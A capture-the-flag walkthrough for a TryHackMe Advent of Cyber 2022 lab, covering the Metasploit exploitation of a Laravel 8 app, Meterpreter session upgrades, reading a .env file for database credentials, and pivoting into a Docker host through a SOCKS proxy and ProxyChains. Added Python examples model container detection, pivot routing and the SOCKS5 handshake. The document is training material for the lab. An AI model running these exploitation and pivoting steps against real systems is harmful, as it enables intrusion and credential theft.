Pivoting
THM: Advent of Cyber 4 (2022), Day 9
Hey there hacker, today I'm gonna walk you through the pivoting tasks under Day 9. Let's begin!
Docker: if a file named /.dockerenv exists in the root directory, you can tell that the application is running inside a Docker container.
This room is all about switching between modules in a framework called Metasploit, which is used to leverage initial access to the target system. The fun part: it's free!
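The /.dockerenv check above is the quickest tell, but it is not the only one. Below is an added example (not from the original post) that bundles it with two other common heuristics, PID 1's cgroup path and an overlay root filesystem, as a pure function that can be exercised on constructed file contents, plus a live wrapper. The marker substrings and the sample lines are assumptions, chosen to reflect typical Docker hosts.

```python
import os

# Paths a live check reads; the pure function below takes their contents instead
DOCKERENV = "/.dockerenv"
CGROUP_FILE = "/proc/1/cgroup"
MOUNTINFO_FILE = "/proc/self/mountinfo"

# Assumed substrings that commonly appear in PID 1's cgroup path inside a container
CGROUP_MARKERS = ("docker", "kubepods", "containerd", "lxc")


def container_indicators(dockerenv_exists, cgroup_text, mountinfo_text):
    """Return the list of container indicators found (empty list = none).

    Arguments are the values is_in_container() reads on a live system, so the
    logic can be tested against constructed input without touching /proc.
    """
    found = []
    if dockerenv_exists:
        found.append("/.dockerenv present")
    for line in cgroup_text.splitlines():
        # cgroup v1 lines look like "12:memory:/docker/<id>", v2 like "0::/<path>"
        path = line.split(":", 2)[-1]
        if any(marker in path for marker in CGROUP_MARKERS):
            found.append(f"cgroup path {path}")
            break
    for line in mountinfo_text.splitlines():
        # mountinfo: ... <mount point> ... "-" <fstype> <source> <options>
        fields = line.split()
        if "-" not in fields:
            continue
        fstype = fields[fields.index("-") + 1]
        if len(fields) > 4 and fields[4] == "/" and fstype == "overlay":
            found.append("overlay root filesystem")
            break
    return found


def _read(path):
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def is_in_container():
    """Live check on the current host using the same heuristics."""
    return bool(container_indicators(os.path.exists(DOCKERENV),
                                     _read(CGROUP_FILE), _read(MOUNTINFO_FILE)))


if __name__ == "__main__":
    # constructed sample input resembling a Docker container
    sample_cgroup = "12:memory:/docker/0123abcd\n11:cpu:/docker/0123abcd\n"
    sample_mounts = "1 0 0:20 / / rw,relatime - overlay overlay rw\n"
    print(container_indicators(True, sample_cgroup, sample_mounts))
    print("this host looks containerised:", is_in_container())
```

None of these signals is conclusive on its own (a host can mount an overlay root, and .dockerenv can be absent in some runtimes), which is why the function reports every indicator it finds rather than a single yes/no.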
Start with recon on the given machine using a basic nmap scan:
Finding common exploits for Laravel version 8.
Start Metasploit by typing "msfconsole" in the terminal.
set rhosts <machine-ip>
set lhost tun0 (or eth0, depending on your interface)
check
Run the exploit using "run" or "exploit". If it doesn't run, type in "set ForceExploit true".
After successfully exploiting the target IP, you can check which user you are running as. The shell you get here is unstable; to get a stable shell we want a Meterpreter shell, which is useful in many ways. You can upgrade the current session to a Meterpreter session with:
sessions -u 1
and then interact with it using:
sessions -i <session id of meterpreter>
Moving forward, let's list the directories from the root directory as this user.
The .env file inside /var/www is of particular interest to us, as it might contain the datab
Exit from shell mode using "exit".
Since we don't know the IP address of the db_host named webservice_database:
Now you can try commands like
ip a or ifconfig
to see the IP address of the machine the Docker container is inside.
But none of these work in this case, so we take the default "172.17.0.1".
Let's now search for the database modules:
auxiliary/scanner/postgres/postgres_schemadump is the module you want to use next.
Before we go ahead we need to modify Metasploit's internal routing table.
This routing table determines where to send network traffic, for instance through a Meterpreter session. This way we use Meterpreter to pivot: sending traffic through it to other machines on the network.
route add <IP/subnet> <meterpreter-session-id>
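To make the routing decision concrete, here is an added toy model of a pivot routing table (not Metasploit's own code): each "route add <subnet> <session-id>" entry becomes a network/session pair, and a lookup for a destination picks the most specific matching route, falling back to "direct" when nothing matches. The class and method names are my own.

```python
import ipaddress


class PivotRoutes:
    """Toy model of 'route add <subnet> <session-id>' and the lookup it enables."""

    def __init__(self):
        self._routes = []  # list of (ip_network, session_id)

    def add(self, cidr, session_id):
        """route add 172.17.0.0/16 1 -> traffic for that subnet goes via session 1."""
        net = ipaddress.ip_network(cidr, strict=False)
        self._routes.append((net, session_id))

    def lookup(self, host):
        """Session id that should carry a connection to host, or None for direct.

        Longest-prefix match: a /24 route wins over a /16 that also contains host.
        """
        addr = ipaddress.ip_address(host)
        best = None
        for net, sid in self._routes:
            if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, sid)
        return None if best is None else best[1]

    def table(self):
        """Lines in the spirit of 'route print': subnet, netmask, gateway session."""
        return [f"{net.network_address}\t{net.netmask}\tSession {sid}"
                for net, sid in self._routes]


if __name__ == "__main__":
    routes = PivotRoutes()
    routes.add("172.17.0.0/16", 1)   # the Docker bridge network behind session 1
    for line in routes.table():
        print(line)
    for dest in ("172.17.0.1", "10.0.0.5"):
        via = routes.lookup(dest)
        print(dest, "->", "direct" if via is None else f"session {via}")
```

The point the model makes is that only traffic generated inside Metasploit consults this table; curl or nmap on your own machine never see it, which is exactly why the SOCKS proxy and ProxyChains steps that follow are needed.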
Now let's use auxiliary/admin/postgres/postgres_readfile (PostgreSQL Server Generic Query).
This completes the Metasploit basics; now comes the main part, "PIVOTING".
SOCKS proxy server: start the SOCKS proxy server. A SOCKS proxy is an intermediate server that relays network traffic between two machines.
Now you can send requests to the Docker container through the SOCKS proxy. Tools such as curl support sending requests through a SOCKS proxy server via the --proxy flag:
curl --proxy socks5://127.0.0.1:1080 http://172.17.0.1
Now there's a file named proxychains4.conf in the /etc folder; open it and edit the contents.
Now, if a tool does not natively support an option for using a SOCKS proxy, ProxyChains can intercept the tool's requests to open new network connections and route them through the SOCKS proxy instead.
proxychains curl http://172.17.0.1
(the output shows: strict chain 127.0.0.1:1080 ... 172.17.0.1:80)
That means we can access the Docker app. Let's run an nmap scan to see which ports are open:
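Whether curl uses --proxy socks5:// directly or ProxyChains intercepts the connect() call, what reaches 127.0.0.1:1080 is the same SOCKS5 exchange (RFC 1928): a greeting, a method selection, a CONNECT request that carries the real destination, and a reply. The added example below (my own code, not from the post or from Metasploit) builds and parses those four messages and runs both sides over a socketpair with a constructed toy proxy that answers "succeeded" without opening any real connection, so the exchange can be inspected offline.

```python
import ipaddress
import socket
import struct
import threading

# SOCKS5 protocol constants (RFC 1928)
VER = 0x05
METHOD_NOAUTH = 0x00
CMD_CONNECT = 0x01
ATYP_IPV4 = 0x01
ATYP_DOMAIN = 0x03
REP_SUCCEEDED = 0x00


def build_greeting():
    """Client -> proxy: VER, NMETHODS, METHODS (we offer only 'no authentication')."""
    return bytes([VER, 1, METHOD_NOAUTH])


def build_connect_request(host, port):
    """Client -> proxy: VER CMD RSV ATYP DST.ADDR DST.PORT.

    The destination travels inside this message, so it is the proxy (here the
    Meterpreter session behind it), not the client, that needs a route to it.
    """
    try:
        dst = bytes([ATYP_IPV4]) + ipaddress.IPv4Address(host).packed
    except ipaddress.AddressValueError:
        name = host.encode("ascii")
        dst = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([VER, CMD_CONNECT, 0x00]) + dst + struct.pack("!H", port)


def parse_connect_request(data):
    """Proxy side: recover (host, port) from a CONNECT request."""
    ver, cmd, _rsv, atyp = data[:4]
    if ver != VER or cmd != CMD_CONNECT:
        raise ValueError("not a SOCKS5 CONNECT request")
    if atyp == ATYP_IPV4:
        host, end = str(ipaddress.IPv4Address(data[4:8])), 8
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        host, end = data[5:5 + n].decode("ascii"), 5 + n
    else:
        raise ValueError("unsupported address type")
    return host, struct.unpack("!H", data[end:end + 2])[0]


def parse_reply(data):
    """Client side: return the REP code; 0 means the proxy connected on our behalf."""
    ver, rep = data[:2]
    if ver != VER:
        raise ValueError("bad version in reply")
    return rep


def _toy_proxy(conn):
    """Constructed proxy side of the exchange: answers 'succeeded' without
    connecting anywhere and reports what the client asked for."""
    greeting = conn.recv(3)
    if greeting[0] != VER:
        raise ValueError("bad greeting")
    conn.sendall(bytes([VER, METHOD_NOAUTH]))           # method selection
    host, port = parse_connect_request(conn.recv(262))  # 262 = largest CONNECT
    bound = ipaddress.IPv4Address("127.0.0.1").packed   # BND.ADDR / BND.PORT
    conn.sendall(bytes([VER, REP_SUCCEEDED, 0x00, ATYP_IPV4]) + bound + struct.pack("!H", 1080))
    return host, port


def demo_exchange(host, port):
    """Run client and toy proxy over a socketpair.

    Returns ((host, port) as seen by the proxy, REP code received by the client).
    """
    client, proxy = socket.socketpair()
    client.settimeout(2)
    seen = {}

    def serve():
        seen["dest"] = _toy_proxy(proxy)

    worker = threading.Thread(target=serve)
    worker.start()
    try:
        client.sendall(build_greeting())
        if client.recv(2) != bytes([VER, METHOD_NOAUTH]):
            raise ValueError("proxy refused our authentication method")
        client.sendall(build_connect_request(host, port))
        rep = parse_reply(client.recv(10))  # IPv4 reply is exactly 10 bytes
    finally:
        worker.join()
        client.close()
        proxy.close()
    return seen["dest"], rep


if __name__ == "__main__":
    print(build_connect_request("172.17.0.1", 80).hex())
    print(demo_exchange("172.17.0.1", 80))
```

Seen from the defended side, this is also why pivoted traffic is hard to spot on the client network: the only connection leaving the attacker's box is to the local proxy, and the real destination appears solely inside the SOCKS payload and on the pivot host's own network stack.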
proxychains nmap -F -sT -Pn 172.17.0.1
Let's go back to Metasploit and search for ssh.
run ssh://santa_username_here:santa_password_here@172.17.0.1
Gosh, that was a lot for a day, but we found out how to pivot through one application to another ;) using tools like a SOCKS proxy and ProxyChains.
There are other methods of pivoting as well; if this topic seems interesting, find out what those might be!
Keep hackin!